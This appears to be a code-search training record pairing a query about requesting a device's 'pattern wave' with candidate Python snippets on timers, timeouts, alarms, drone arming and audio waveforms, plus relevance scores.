"def trigger(self):\n if self.timer is None or time.time() - self.last_try > self.min_sec * 2:\n self.timer = time.time()\n self.last_try = time.time()\n return False\n elif time.time() - self.timer > self.min_sec:\n self.reset()\n return True\n else:\n self.last_try = time.time()\n return False",
"def alarmoff() :\n s.alarm(False, \"\")",
"def reset_timer():\n resetTimer = time.time()\n target_time.clear()\n target_time.append(resetTimer)",
"def _arm(self,n_ticks):\n # Set down counter\n self.__counter = n_ticks\n\n # Arm by adding to QF_tick timer list here\n self.__qf.addTimer(self)",
"def wakeup(\n self, timeout: int, callback: Callable[[RTC], None] | None = None, /\n ) -> None:",
"def caltimer(ants=0, reps=1, tmo=15) :\n if ants == 0: ants = currentAntennaNumbers()\n antlist = helpers.makeList(ants)\n def looper(a, t, skypos):\n if skypos : label = \"SKY\"\n else : label = \"AMBIENT\"\n print label + \" started\"\n t0 = time.time()\n timeout = t0 + t\n if skypos: state = carma.antenna.common.CalibratorControl.SKY\n else: state = carma.antenna.common.CalibratorControl.AMBIENT\n s.cal(state, a)\n keepGoing = True\n while keepGoing:\n t = time.time()\n res = wait(CAL, a, timeout-t, ANY)\n #print \"RES:\", res.ready, res.notready\n t = time.time()\n r = res.ready\n a = res.notready\n if len(r) > 0:\n m = \" %4.2f: \" %(t-t0)\n prefix = \"\"\n for i in r:\n m += prefix + \"C%d\" %i\n prefix = \", \"\n print m\n if t >= timeout:\n keepGoing = False\n if len(a) > 0:\n m = \" did not complete: \" \n prefix = \"\"\n for i in a:\n m += prefix + \"C%d\" %i\n prefix = \", \"\n print m\n print \" Timeout \" + label \n return \n if len(a) == 0: keepGoing = False \n print \" Completed \" + label \n for r in range(reps) :\n looper(a=antlist, t=tmo, skypos=False)\n looper(a=antlist, t=tmo, skypos=True)",
"def _banner_timeout(self):\n self.sm.on_state_event(self.events.BANNERTIMEOUT)",
"def reset_timeout(self, timeout: float) -> None:\n self._reset_timeout = timeout",
"def _reset_ack_timeout(self, timeout):\n if self._ack_handle.active():\n self._ack_handle.reset(timeout)\n else:\n self._ack_handle = REACTOR.callLater(timeout, self._send_ack)",
"def setTimeOut(self, timeout=6.0):\n self.timeout = timeout",
"def pytest_timeout_cancel_timer(item):",
"def setScreenTimeout(self, timeInMinutes, unitCode=0):\n if timeInMinutes < 0:\n timeInMinutes = 0\n elif timeInMinutes > 15:\n timeInMinutes = 15\n resp = self.XAPCommand('TOUT', timeInMinutes, unitCode=unitCode)\n return int(resp)",
"def arm_and_takeoff(aTargetAltitude):\r\n\r\n print(\"Basic pre-arm checks\")\r\n # Don't try to arm until autopilot is ready\r\n while not vehicle.is_armable:\r\n print(\" Waiting for vehicle to initialise...\")\r\n time.sleep(1)\r\n\r\n print(\"Arming Throttle\")\r\n # Copter should arm in GUIDED mode\r\n\t# XXX : what the heck is this?\r\n #vehicle.mode = VehicleMode(\"GUIDED\")\r\n vehicle.armed = True\r\n\r\n # Confirm vehicle armed before attempting to take off\r\n while not vehicle.armed:\r\n print(\" Waiting for arming...\")\r\n time.sleep(1)",
"def analogDaTimeoutOff(self, Debug=0):\n self.bib.DapiSpecialCommand.argtypes = \\\n [c_ulong, c_ulong, c_ulong, c_ulong, c_ulong]\n self.bib.DapiSpecialCommand.restype = None\n self.bib.DapiSpecialCommand(self.handle, self.DAPI_SPECIAL_CMD_TIMEOUT, \\\n self.DAPI_SPECIAL_TIMEOUT_DEACTIVATE, 0, 0) # ...switch off TO \n timeout_status = self.analogDaTimeoutStatus() # check it...\n if Debug == 1 and timeout_status == 0:\n print(\"Timeout off:\",timeout_status)\n else:\n return(timeout_status)",
"def pytest_timeout_set_timer(item, settings):",
"def __init__(self, timeout=129600):\n self.timeout = timeout",
"def set_alarm(self):\n time_str = self.settings_window.validate_alarm_input()\n if time_str:\n # Update displayed alarm time settings and main window\n self.main_window.alarm_time_lcd.display(time_str)\n self.settings_window.set_alarm_input_success_message_with_time(time_str)\n self.config[\"main\"][\"alarm_time\"] = time_str\n\n # Set alarm play timer\n self.alarm_dt = utils.time_str_to_dt(time_str)\n alarm_wait_ms = (self.alarm_dt - datetime.now()).seconds * 1000\n\n event_logger.info(\"Setting alarm for %s\", time_str)\n self.alarm_timer.start(alarm_wait_ms)\n\n # Setup alarm build time for 5 minutes earlier (given large enough timer)\n ALARM_BUILD_DELTA = 5 * 60 * 1000\n alarm_build_wait_ms = max((0, alarm_wait_ms - ALARM_BUILD_DELTA)) # 0 if not enough time\n\n alarm_build_dt = self.alarm_dt - timedelta(minutes=5)\n event_logger.info(\"Setting alarm build for %s\", alarm_build_dt.strftime(\"%H:%M\"))\n self.alarm_build_timer.start(alarm_build_wait_ms)\n\n # Set screen brightness to low if nighttime and nigthmode enabled\n if self._nightmode_active():\n low_brightness = self.config[\"main\"].get(\"low_brightness\", 12)\n rpi_utils.set_display_backlight_brightness(low_brightness)",
"def wait_for_disarm(vehicle, timeout=180):\n wait_count = 0\n sleep_period = 1\n log_period = 30\n \n timeout_limit = timeout/sleep_period\n log_count = log_period/sleep_period\n \n while vehicle.armed:\n if wait_count % log_count == 0: # 10sec period logging\n util.log_info(\"Waiting for the copter to disarm.\")\n \n if wait_count >= timeout_limit:\n util.log_warning(\"Wait timeout! Exit script now!\")\n break\n \n time.sleep(sleep_period)\n wait_count = wait_count + 1",
"def ll_uart_set_cmd_timeout(self,timeout = 10):\r\n\r\n self._ll_rx_timeout = timeout",
"def reset_timer(self, *_) -> \"ALL\":\n self.last = time.time()\n delta = time.time() - self.last\n if delta > 180:\n print(\n \"!!! Warning: Watchdog failure detected, spawning a fallback \"\n \"thread.\"\n )\n self.watchdog = FallbackWatchdog(self)\n self.watchdog.start()",
"def start_alarm(self):\n self.out_power.pulse()",
"def __init__(self, timeout_time):\n self.timeout_time = timeout_time",
"def set_timeout(seconds, on_timeout):\n\n def _sighandler(signum, frame):\n on_timeout()\n\n signal.signal(signal.SIGALRM, _sighandler)\n signal.alarm(seconds)",
"def set_timeout(self, timeout):\n if self.interface is not None:\n self.interface.timeout = timeout",
"def set_timeout(self, timeout):\n self.timeout = timeout",
"def arm_and_takeoff(vehicle, target_alt, loiter_time):\n util.log_info(\"Checking if armable.\")\n \n wait_count = 0\n while not vehicle.is_armable:\n time.sleep(.2)\n wait_count = wait_count + 1\n \n if wait_count % 25 == 0:\n util.log_warning(\"Vehicle not armable.\")\n \n if wait_count >= 100:\n util.log_warning(\"Unable to arm. Abort.\")\n shared.status['abort'] = True\n return False\n\n util.log_info(\"Switching to GUIDED and Arming.\")\n set_mode(vehicle, \"GUIDED\")\n\n util.log_debug(\"Arming...\")\n vehicle.armed = True\n time.sleep(3)\n \n wait_count = 0\n while True:\n time.sleep(.5)\n wait_count = wait_count + 1\n \n if vehicle.armed :\n util.log_info(\"Armed.\")\n break\n \n elif wait_count % 10 == 0:\n util.log_warning('Retry arming.')\n \n if wait_count >= 20:\n util.log_warning(\"Arming failed. Abort.\")\n shared.status['abort'] = True\n return False\n\n vehicle.simple_takeoff(target_alt) \n\n # Wait until the vehicle reaches a safe altitude (95%), or otherwise the command \n # after Vehicle.simple_takeoff will execute immediately, causing unexpected results.\n while True:\n util.log_debug(\"Altitude: %s\" % vehicle.location.global_relative_frame.alt) \n if vehicle.location.global_relative_frame.alt >= target_alt - shared.ALT_TOLERANCE:\n util.log_info(\"Target altitude reached: %s m.\" % vehicle.location.global_relative_frame.alt)\n break\n\n time.sleep(.5)\n \n time.sleep(loiter_time)\n return True",
"def set_fan_timer_timeout(self, time_: str = None):\r\n if time_ is not None:\r\n self._fan_timer_timeout = datetime.fromisoformat(time_)\r\n else:\r\n self._fan_timer_timeout = datetime.now() + self._fan_timer_duration\r\n\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"fan_timer-timeout\", self.fan_timer_timeout))",
"def timeout(self, timeout):\n assert timeout is None or timeout > 0\n self._timeout = timeout",
"def timer(*args, endTimer: bool=True, lapTime: bool=True, name: AnyStr=\"\", startTimer:\n bool=True, **kwargs)->None:\n pass",
"def timer_object_timeout(seconds=5):\n def raise_timeout_exception():\n raise TimeoutReachedException(seconds=seconds)\n\n return Timer(seconds, raise_timeout_exception)",
"def set_timeout(self, timeout):\n pass",
"def set_invoke_timer(self, timeout, retry_entry=False):\n if self.timer_entry is not None and self.timer_entry.active:\n self.timer_entry.deactivate()\n #print(\"(%d) set_invoke_timer:\" % int(time.time()), timeout)\n self.timer_entry = query_management.QueryEntry(expire_after=timeout,\n callback_expire=self._perform_key_exchange,\n retry_count=0)\n if retry_entry:\n self.timer_entry.data[KeyType.retry_timer] = True",
"def set_tgpio_modbus_timeout(self, timeout, is_transparent_transmission=False, **kwargs):\r\n return self._arm.set_tgpio_modbus_timeout(timeout, is_transparent_transmission=is_transparent_transmission, **kwargs)",
"def input_to(timeout=1): # time after which enemies move automatically\n signal.signal(signal.SIGALRM, alarmhandler)\n signal.alarm(timeout)\n try:\n text = G()\n signal.alarm(0)\n return text\n except AlarmException:\n print(\"\\n Prompt timeout. Continuing\")\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n return ''",
"def settimeout(self,timeout=10):\r\n # Update\r\n self.timeout = timeout",
"async def async_alarm_arm_night(self, code: str | None = None) -> None:\n self._cluster_handler.arm(IasAce.ArmMode.Arm_Night_Sleep_Only, code, 0)\n self.async_write_ha_state()",
"def _default__band_timer(self):\n timer = QTimer()\n timer.setSingleShot(True)\n timer.timeout.connect(self._on_band_timer)\n return timer",
"def __init__(self, timeout=120):\n self.m_timeout = timeout",
"def _default__rose_timer(self):\n timer = QTimer()\n timer.setSingleShot(True)\n timer.timeout.connect(self._on_rose_timer)\n return timer",
"def arm_calibration(self):\n self.arm_motor.run_forever(speed_sp=900)\n while not self.touch_sensor.is_pressed:\n time.sleep(0.01)\n self.arm_motor.stop(stop_action=\"brake\")\n ev3.Sound.beep()\n self.arm_motor.run_to_rel_pos(\n speed_sp=900, position_sp=-5100)\n self.arm_motor.wait_while(ev3.Motor.STATE_RUNNING)\n print('motor is no longer running')\n ev3.Sound.beep()\n self.arm_motor.position = 0",
"def _wakeup(self, wakeup_timeout=10, response_timeout=3):\n pass",
"def _vios_waits_timed_out(no_rmc_vwraps, time_waited, max_wait_time=None):\n wait_time = max_wait_time\n if wait_time is None:\n wait_time = _LOW_WAIT_TIME\n # if any VIOS is still early in its startup, wait longer to give RMC\n # time to come up\n for vwrap in no_rmc_vwraps:\n if vwrap.uptime <= _UPTIME_CUTOFF:\n wait_time = _HIGH_WAIT_TIME\n break\n return time_waited >= wait_time",
"def __init__( self, timeout = 60.0 ):\n\n self.timeout = timeout\n self.alive = None",
"def setdefaulttimeout(timeout):\r\n global default_timeout\r\n default_timeout = timeout",
"def reset_timer(self):\r\n self.time_minutes = 0\r\n self.time_seconds = 0",
"def timeout(time_limit):\n\n class TimeoutException(Exception):\n \"\"\" Subclass Exception to catch timer expiration during search \"\"\"\n pass\n\n def handler(*args, **kwargs):\n \"\"\" Generic handler to raise an exception when a timer expires \"\"\"\n raise TimeoutException(\"Test aborted due to timeout. Test was \" +\n \"expected to finish in less than {} second(s).\".format(time_limit))\n\n def wrapUnitTest(testcase):\n\n @wraps(testcase)\n def testWrapper(self, *args, **kwargs):\n\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(time_limit)\n\n try:\n return testcase(self, *args, **kwargs)\n finally:\n signal.alarm(0)\n\n return testWrapper\n\n return wrapUnitTest",
"def pytest_timeout_cancel_timer(item):\n tle.lib.cancel()\n return True",
"async def test_sleep_timer_services(\n hass: HomeAssistant,\n aioclient_mock: AiohttpClientMocker,\n caplog: pytest.LogCaptureFixture,\n) -> None:\n await init_integration(hass, aioclient_mock)\n\n with patch(\"aiomodernforms.ModernFormsDevice.light\") as light_mock:\n await hass.services.async_call(\n DOMAIN,\n SERVICE_SET_LIGHT_SLEEP_TIMER,\n {ATTR_ENTITY_ID: \"light.modernformsfan_light\", ATTR_SLEEP_TIME: 1},\n blocking=True,\n )\n await hass.async_block_till_done()\n light_mock.assert_called_once_with(sleep=60)\n\n with patch(\"aiomodernforms.ModernFormsDevice.light\") as light_mock:\n await hass.services.async_call(\n DOMAIN,\n SERVICE_CLEAR_LIGHT_SLEEP_TIMER,\n {ATTR_ENTITY_ID: \"light.modernformsfan_light\"},\n blocking=True,\n )\n await hass.async_block_till_done()\n light_mock.assert_called_once_with(sleep=0)",
"def setdefaulttimeout(timeout):\r\n global _TIMEOUT\r\n _TIMEOUT = timeout",
"def timeout(time: int) -> None:\n\n # Defines the signal handler\n def raise_timeout(signum, frame):\n raise TimeoutError\n\n # Register a function to raise a TimeoutError on the signal\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after specified time\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError:\n pass\n finally:\n # Unregister the signal so it won't be triggered if the timeout is not reached\n signal.signal(signal.SIGALRM, signal.SIG_IGN)",
"def timeout(self):\n self._status_update(\"Pyloton: Timeout\")\n time.sleep(3)",
"def _timeout(signum, frame):\n # Raise TimeoutException with system default timeout message\n raise TimeoutException()",
"def alarm(seconds): # real signature unknown; restored from __doc__\n pass",
"def functionThatWillTimeOut():\n time.sleep(5)",
"def on_timeout(self):\n pass",
"def stop_timer(self):\n self.end_time = datetime.now()",
"def SetBacklightTimeout(self,Timeout):\n self._BacklightTimeout = Timeout",
"def set_timeout(self, timeout: int) -> None:\n raise WatchdogError(\"Setting timeout is not supported on {0}\".format(self.describe()))",
"def time_limit(seconds):\n def signal_handler(signum, frame):\n raise TimeoutException(\"TIMEOUT\")\n signal.signal(signal.SIGALRM, signal_handler)\n signal.alarm(seconds)\n try:\n yield\n finally:\n signal.alarm(0)",
"def set_trigger(self, channel, threshold, delay=0.0, direction='rising', timeout=0.1, enable=True):\n ch = self.convert_to_enum(channel, self.enChannel, to_upper=True)\n if ch.name not in self._channels_dict:\n msg = \"Must call set_channel(channel='{0}', ...) before enabling a trigger with channel {0}\".format(ch.name)\n self.raise_exception(msg)\n\n if self._sampling_interval is None:\n self.raise_exception('Must call set_timebase(...) before setting the trigger')\n\n if ch == self.enChannel.EXT:\n threshold_adu = int(round(self.EXT_MAX_VALUE * threshold/float(self.EXT_MAX_VOLTAGE)))\n else:\n voltage_offset = self._channels_dict[ch.name].voltage_offset\n adu_per_volt = 1.0/self._channels_dict[ch.name].volts_per_adu\n threshold_adu = int(round(adu_per_volt * (threshold + voltage_offset)))\n\n delay_ = int(round(delay / self._sampling_interval))\n if delay < 0:\n msg = 'The trigger delay must be >=0 seconds, requested a delay of {} seconds'.format(delay)\n self.raise_exception(msg)\n elif delay_ > self.MAX_DELAY_COUNT:\n msg = 'The maximum allowed trigger delay is {} seconds, ' \\\n 'requested a delay of {} seconds'.format(self.MAX_DELAY_COUNT*self._sampling_interval, delay)\n self.raise_exception(msg)\n\n trig_dir = self.convert_to_enum(direction, self.enThresholdDirection, to_upper=True)\n auto_trigger_ms = int(round(max(0.0, timeout*1e3)))\n return self.SetSimpleTrigger(self._handle, enable, ch, threshold_adu, trig_dir, delay_, auto_trigger_ms)",
"def setTimeout(self, timeout):\n self.timeout = timeout",
"def __init__(self, seconds):\n super(RobotiqCommandTimeout, self).__init__()\n self.start_time = rospy.get_rostime()\n self.duration = rospy.Duration(seconds)",
"def timeout(self, timeout):\n\n self._timeout = timeout",
"def set_timeout(self, timeout: float) -> None:\n self._timeout = timeout",
"def TimeOutRaiser(signum, frame):\n if( Z3running ):\n raise Exception(\"z3 solver is too slow\")",
"def reset_arm_and_wait(self, arm, mode, data, timeout):\n reset_command = PositionCommand()\n reset_command.mode = mode\n reset_command.data = data\n reset_command.pd_gains = self._hyperparams['pid_params']\n reset_command.arm = arm\n reset_command.id = self._get_next_seq_id()\n self._reset_service.publish_and_wait(reset_command, timeout=timeout)",
"def _banner_timeout(self):\n self.hide_banner()\n self._request_redraw()\n self.sm.on_state_event(self.events.TIMEOUT)",
"def med_timer(self):\n self.start_button.config(text='Sit', state='disabled')\n self.start_button.update()\n if self.mins.get() == \"\":\n num_mins = 0\n else:\n num_mins = float(self.mins.get())\n time_in_seconds = num_mins * 60\n self.t = Timer(time_in_seconds, self.play_wav)\n self.t.start()",
"def test_timeout(self, mocker, mock_timedelta):\n\n tid = 289466\n site = \"mysite\"\n\n exception_response = self.generate_task_dictionary(\n tid, state=\"started\", completed=None\n )\n\n responses = [{\"json\": exception_response}]\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, responses)\n\n with self.assertRaises(exceptions.AcquiaCloudTimeoutError):\n self.client.site(site).task(tid).wait(0)",
"def _ims_res_timing(self) -> None:\n self._ims_res_timer.start(500)",
"def create_timer(function, time):\n timer = Timer()\n timer.timeout.connect(function)\n timer.start(time)\n timer.speed = time\n return timer",
"def _no_motion_for_long_time(self, *_args, **_kwargs):\n light_st = self.get_state(self._light_group)\n self._light_on = light_st == \"on\"\n\n if not self._light_on:\n return\n\n now = monotonic()\n self.log(\n f\"NO MOTION FOR A LONG TIME (since {self._last_light_on:.0f} s)-> \"\n f\"{self._motion_states} / {self._motion_on}. \"\n f\"Handler off={self._handler_turn_off_lights}\",\n log=LOGGER,\n )\n if (\n (now - self._last_light_on > self._max_delay_motion_off - 1)\n and (now - self._last_switch_press > self._max_switch_delay())\n ) or (\n self._handler_turn_off_lights is None\n ):\n # Safety turn off\n self.log(\n f\"TURN OFF LIGHTS AFTER NO MOTION FOR A LONG TIME\",\n level=\"ERROR\",\n log=LOGGER,\n )\n self._turn_lights_off()",
"def raise_arm(self):\r\n self.arm_motor.turn_on(self.speed)\r\n while not self.arm_touch_sensor.is_pressed():\r\n pass\r\n self.arm_motor.turn_off()\r\n\r\n # ---------------------------------------------------------------------\r\n # Done: 6. Implement this method; it is a ONE-LINER! (not)\r\n # ---------------------------------------------------------------------\r",
"def arm():\n\n\tprint \"In arm state\"\n\n\tglobal cs, cc\n\tglobal state\n\n\tmsg = cs.recv(BUF_SIZE) \n\n\tif msg != 'ARM':\n\t\terror(msg)\n\t\tstate = 6 # exit failure\n\telse:\n\t\tcc.arm()\n\t\tcc.set_mode('GUIDED')\n\t\t\n\t\tto = time.time() + TIMEOUT\n\t\twhile not cc.is_armed() and cc.get_mode_name() != 'GUIDED':\n\t\t\tif time.time() > to:\n\t\t\t\tcs.send('TIMEOUT')\n\t\t\t\tstate = 6\n\t\t\t\treturn\n\t\t\ttime.sleep(0.1)\n\t\t\n\t\tcs.send('Armed')\n\t\tstate += 1",
"def reset_timeout(self) -> float:\n return self._reset_timeout",
"def test_lock_timeout_loop():\n lock_unlock_timeout(0.2)",
"def setTimeOut(self, sec):\n if (sec is not None) and (sec > 0):\n to = sec\n else:\n to = None\n self._simulator_.update(timeout=to)\n\n return",
"async def async_turn_off(self, **kwargs) -> None:\n await self._zone.set_mode(\"timer\")",
"def drain_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"drain_timeout_in_minutes\")",
"def test_lock_timeout():\n lock_unlock_timeout(0)",
"def restart_motion_timer(self) -> None:\n if \"motion_timer\" in self.handles:\n self.adbase.cancel_timer(self.handles[\"motion_timer\"])\n self.handles.pop(\"motion_timer\")\n self.handles[\"motion_timer\"] = self.adbase.run_in(\n self.disable_area_motion, self.delay_off\n )",
"def checkTimeout(self):\n if TIMEOUT <= (datetime.now() - self.clockCheckStop).total_seconds():\n print('Didn\\'t received messages for 1 minute - Program ends')\n exit(0)",
"def arm_and_takeoff(aTargetAltitude):\n\n print ('Basic pre-arm checks')\n # Don't try to arm until autopilot is ready\n while not vehicle.is_armable:\n print ('Waiting for vehicle to initialise...')\n time.sleep(1)\n\n \n print ('Arming motors')\n # Copter should arm in GUIDED mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n vehicle.armed = True \n\n # Confirm vehicle armed before attempting to take off\n while not vehicle.armed: \n print ('Waiting for arming...')\n time.sleep(1)\n\n print ('Taking off!')\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n\n while True:\n # print \"Global Location (relative altitude): %s\" % vehicle.location.global_relative_frame\n if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: \n break\n time.sleep(1)",
"def test_custom_time(self):\n interval = 0.5\n M = simulation.StateMonitor(self.G, 'v', interval=interval)\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, interval)))",
"def arm_and_takeoff(aTargetAltitude):\n\n print(\"Basic pre-arm checks\")\n # Don't let the user try to arm until autopilot is ready\n while not vehicle.is_armable:\n print(\" Waiting for vehicle to initialise...\")\n time.sleep(1)\n\n \n print(\"Arming motors\")\n # Copter should arm in GUIDED mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n vehicle.armed = True\n\n while not vehicle.armed: \n print(\" Waiting for arming...\")\n time.sleep(1)\n\n print(\"Taking off!\")\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n\n # Wait until the vehicle reaches a safe height before processing the goto (otherwise the command \n # after Vehicle.simple_takeoff will execute immediately).\n while True:\n print(\" Altitude: \", vehicle.location.global_relative_frame.alt) \n if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.9: #Trigger just below target alt.\n print(\"Reached target altitude\")\n break\n time.sleep(1)",
"def stopped_check(self, timeout=None):",
"def timeout_function(seconds=5):\n\n def signal_handler(signum, frame):\n raise TimeoutError(\"Timed out!\")\n\n signal.signal(signal.SIGALRM, signal_handler)\n signal.alarm(seconds)\n\n try:\n yield\n finally:\n signal.alarm(0)"
] | [
"0.68168837",
"0.6529387",
"0.61601263",
"0.60441667",
"0.59999216",
"0.59811276",
"0.5938586",
"0.5874886",
"0.58427435",
"0.5785943",
"0.5688475",
"0.56534606",
"0.56367904",
"0.563389",
"0.5626759",
"0.5621003",
"0.56125724",
"0.56084305",
"0.5593728",
"0.55809",
"0.55778444",
"0.5572736",
"0.5571767",
"0.55514604",
"0.551192",
"0.5495423",
"0.5482235",
"0.54805297",
"0.5469997",
"0.54680365",
"0.5460496",
"0.5460205",
"0.54529834",
"0.5452933",
"0.5431624",
"0.54228514",
"0.5413716",
"0.5410594",
"0.54003054",
"0.53983265",
"0.5390095",
"0.53897923",
"0.5385856",
"0.53788334",
"0.53772277",
"0.537451",
"0.5370083",
"0.53617084",
"0.53570735",
"0.5351354",
"0.53486687",
"0.534412",
"0.53373766",
"0.5336915",
"0.5333564",
"0.533175",
"0.53179175",
"0.5306667",
"0.5295001",
"0.528193",
"0.5280276",
"0.52713007",
"0.52530205",
"0.5252253",
"0.52400184",
"0.5233631",
"0.5230823",
"0.52278537",
"0.52175045",
"0.5208059",
"0.5205792",
"0.5203758",
"0.51993394",
"0.5191307",
"0.5184051",
"0.51743174",
"0.5174071",
"0.51704144",
"0.51644653",
"0.5164356",
"0.51600647",
"0.51598674",
"0.51592964",
"0.51556355",
"0.5142224",
"0.5139794",
"0.5137177",
"0.51354045",
"0.5134674",
"0.5134038",
"0.5126756",
"0.5122052",
"0.5118369",
"0.511523",
"0.51147443",
"0.5094395",
"0.5089951",
"0.508278",
"0.50811565",
"0.5078297"
] | 0.6253944 | 2 |
Gets the pattern wave pat_wave 101011110011 .... >>> Request >>> 0> >>> Pattern Wave [More to follow] >>> >> Request Next block >>> 0> >>> Pattern Wave [More to follow] >>> >> >>> ..... >>> >>> Request Next block >>> 0> >>> Pattern Wave [No More to follow] >>> <) | def __request_pat_wave(self, r_number):
packet = bytearray()
packet.append(0) # 16 bit options
packet.append(0) # 8 bit options
packet.append(1) # Request the 1 option
# ---------------------------------------------------------------------
# Request the variable length options. pattern wave.
packet.append(0x01 << t_var_size_Options.PATTERN_WAVE)
# ---------------------------------------------------------------------
# Packets to follow
packet.append(r_number)
# ---------------------------------------------------------------------
# Length of the bytes to follow
packet.append(0)
rval = self.interact_with_shouter(packet)
if rval != False:
return rval
return [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def wave(self):\n return self._wave",
"def waveband(self):\n return self.get(\"waveband\")",
"def waveband(self):\n return self.get(\"waveband\", default=\"\", decode=True).split(\"#\")",
"def _wave(self):\n try:\n return wave.open(StringIO(self.contents))\n except wave.Error, err:\n err.message += \"\\nInvalid wave file: %s\" % self\n err.args = (err.message,)\n raise",
"def getWave(self):\n return self._wave",
"def getPattern(self):\n return self.pattern",
"def get_wstart(ref, wave_ref, wave_per_pixel):\n\n return wave_ref - ((ref-1) * wave_per_pixel)",
"def waveband(self):\n return self._band",
"def wave_tx_repeat():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVGOR, 0, 0))",
"def get_waveforms(self, network, station, location, channel, starttime,\n endtime):\n # padding channel with spaces does not make sense\n if len(channel) < 3 and channel != \".*\":\n msg = \"channel expression matches less than 3 characters \" + \\\n \"(use e.g. 'BHZ', 'BH?', 'BH[Z12]', 'B??')\"\n raise Exception(msg)\n seedname = '%-2s%-5s%s%-2s' % (network, station, channel, location)\n # allow UNIX style \"?\" wildcard\n seedname = seedname.replace(\"?\", \".\")\n return self.get_waveforms_nscl(seedname, starttime,\n endtime - starttime)",
"def getRicker(f,t):\n # assert len(f) == 1, 'Ricker wavelet needs 1 frequency as input'\n # f = f[0]\n pift = pi*f*t\n wav = (1 - 2*pift**2)*np.exp(-pift**2)\n return wav",
"def get_waveform_halfwidth(waveform, sampling_rate=30000.):\n w = resample(waveform,200)#upsample to smooth the data\n time = np.linspace(0,len(waveform)/sampling_rate,200)\n trough = np.where(w==np.min(w))[0][0]\n peak = np.where(w==np.max(w))[0][0]\n \n #dur = time[trough:][np.where(w[trough:]==np.max(w[trough:]))[0][0]] - time[trough]\n if w[peak] > np.abs(w[trough]):\n dur = time[peak:][np.where(w[peak:]>=0.5*np.min(w[peak:]))[0][0]] - time[peak] \n else:\n dur = time[trough:][np.where(w[trough:]<=0.5*np.max(w[trough:]))[0][0]] - time[trough] \n if peak<trough:\n dur=-dur\n return dur",
"def wave_parameters(self):\n return self._wave_params",
"def rec_one_shot(self, sec, file_name=None):\n self.__open_noncallback_stream()\n frames = []\n for i in range(int(self.RATE / self.CHUNK * sec)):\n data = self.stream.read(self.CHUNK)\n data = np.fromstring(data, dtype=np.int16)\n frames.append(data)\n self.stream.stop_stream()\n if file_name is not None:\n with wave.open(file_name, 'wb') as wav_file:\n wav_file.setnchannels(self.CHANNELS)\n wav_file.setsampwidth(self.recorder.get_sample_size(self.FORMAT))\n wav_file.setframerate(self.RATE)\n wav_file.writeframes(b''.join(frames))\n frame = np.concatenate(frames, 0)\n self.stop_streaming()\n return frame",
"def pattern(self):\n return self.get_data(\"pattern\")",
"def wave_samples(self):\n return self._quantized_subsamples",
"def test_signal(self, data = \"MODE=init\"):\n resdat = wavehttp.get(\"/wave/wfe/test?VER=6&\"+data+\"&zx=\"+self.zx()+\"&t=1\")\n return resdat",
"def wave_send_repeat(wave_id):\n return _u2i(_pigpio_command(_control, _PI_CMD_WVTXR, wave_id, 0))",
"def askwave(self):\n if self.status != \"not connected\":\n m = self.serial\n m.write(\"wave?\" + \"\\r\\n\")\n r = m.read(100)\n r = r[7:]\n result = string.strip(r)\n return result\n else:\n pass",
"def pattern(self):\n return self[\"pattern\"]",
"def pattern(self):\n return self[\"pattern\"]",
"def modulate(data):\n\n wave = ''\n levels = ('\\x00', '\\x55', '\\xaa', '\\xff')\n \n for frame in data:\n next_num = frame\n for grp in range(4):\n wave += levels[next_num % 4]\n next_num /= 4\n\n return wave",
"def rate(self):\n if self._rate:\n return self._rate\n else:\n return self._wave.getframerate()",
"def record_and_get_wav(self, time):\n sample_width, frames = self.record_audio(time)\n return WavFile(samples=frames, sample_width=sample_width, time=time)",
"def do_wave(l, wave_type, r, g, b, duration, repeat):\n command = create_wave_command(\n wave_type, r, g, b, duration, repeat\n )\n l.write(command)",
"def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate",
"def __next_chunk_pattern(self, chunk_sectors:int):\n\t\tcurr_pat = next(self.pat_it, None)\t\t\t\n\n\t\tif (curr_pat is None):\n\t\t\tself.__reset_pat()\n\t\t\tcurr_pat = next(self.pat_it, None)\n\t\t\t\t\t\n\t\treturn bytearray(curr_pat[0:chunk_sectors * 512])",
"def spectral(w, s=1.0):\n n_in, n_out = w.size()\n n = max(n_out, n_in)\n gain = s / math.sqrt(n)\n return w.normal_(0, 1).mul_(gain)",
"def wav(self):\n if self._wav is None and self._nu is not None:\n return self._nu.to(u.micron, equivalencies=u.spectral())\n else:\n return self._wav",
"def get_pattern(self, name):\n return self._pattern_reg[name]",
"def get_silence(self, duration):\n nsamples = int(self.sample_rate * duration)\n return \"\".join([wave.struct.pack('h', 0) for i in range(0, nsamples)])",
"def wave_tx_busy():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVBSY, 0, 0))",
"def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]",
